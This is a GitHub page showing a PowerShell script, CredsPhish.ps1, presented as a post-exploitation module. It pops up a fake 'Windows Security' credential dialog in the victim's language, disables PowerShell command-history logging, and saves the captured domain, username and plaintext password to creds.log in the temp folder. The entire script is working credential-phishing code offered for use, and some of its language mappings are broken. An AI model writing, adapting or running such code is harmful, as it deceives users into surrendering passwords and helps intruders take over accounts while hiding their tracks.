-
Notifications
You must be signed in to change notification settings - Fork 104
/
Copy pathCredsPhish.ps1
98 lines (84 loc) · 5.83 KB
/
CredsPhish.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
<#
.SYNOPSIS
Prompt the current user for a valid credential.
Author: @r00t-3xp10it
Tested Under: Windows 10 (19044) x64 bits
Required Dependencies: none
Optional Dependencies: none
PS cmdlet Dev version: v1.2.6
.DESCRIPTION
This module spawns a remote 'PromptForCredential' dialogBox
in the hope that target enters is credentials to leak them.
.NOTES
Supported languages: pt-PT,en-AU,pt-BZ,pt-BR,en-IE,de-AT,de-FR,eu-ES,nl,nl-BQ
.Parameter PhishCreds
Accepts arguments: Start (default: Start)
.EXAMPLE
PS C:\> .\CredsPhish.ps1 -PhishCreds start
Prompt the current user for a valid credential.
.OUTPUTS
Domain UserName Password
------ -------- --------
SKYNET pedro s3cr3t
#>
## Non-Positional cmdlet named parameters
[CmdletBinding(PositionalBinding=$false)] param(
[string]$UserAccount=$([Environment]::UserName),
[string]$PhishCreds="Start"
)
$ErrorActionPreference = "SilentlyContinue"
## Disable Powershell Command Logging for current session.
Set-PSReadlineOption –HistorySaveStyle SaveNothing|Out-Null
If($PhishCreds -ieq "Start")
{
Write-Host ""
## Supported languages
$message_ho = "Voer gebruikersgegevens in"
$message_en = "Please enter user credentials"
$message_it = "Inserire le credenziali dell'utente"
$message_ge = "Bitte geben Sie Ihre Anmeldedaten ein"
$message_pt = "Introduzir as credenciais de utilizador"
$message_sp = "Por favor, introduzca sus credenciales de usuario"
$message_fr = "Veuillez saisir les informations d'identification de l'utilisateur"
## Get the first installed language with Get-WinUserLanguageList
# if no supported language is found the script will use English.
$language = $(Get-WinUserLanguageList)[0].LanguageTag
If($language -match 'en-AU')
{
$message = $message_en
}
ElseIf(($language -match 'pt-PT') -or ($language -match 'pt-BZ') -or ($language -match 'pt-BR'))
{
$message = $message_pt
}
ElseIf($language -match 'en-IE')
{
$message = $message_it
}
ElseIf($language -match 'de-AT')
{
$message = $message_de
}
ElseIf($language -match 'de-FR')
{
$message = $message_fr
}
ElseIf($language -match 'eu-ES')
{
$message = $message_sp
}
ElseIf(($language -match 'nl') -or ($language -match 'nl-BQ'))
{
$message = $message_ho
}
Else
{
$message = $message_en
}
$cred = ($Host.ui.PromptForCredential("Windows Security", "$message", "$Env:USERDOMAIN\$Env:USERNAME",""))
$username = "$Env:USERNAME";$domain = "$Env:USERDOMAIN";$full = "$domain" + "\" + "$username" -join ''
$password = $cred.GetNetworkCredential().password
Add-Type -assemblyname System.DirectoryServices.AccountManagement
$output = $cred.GetNetworkCredential()|Select-Object Domain,UserName,Password|Format-Table
echo $output|Out-File "$Env:TMP\creds.log" -encoding ascii -force
}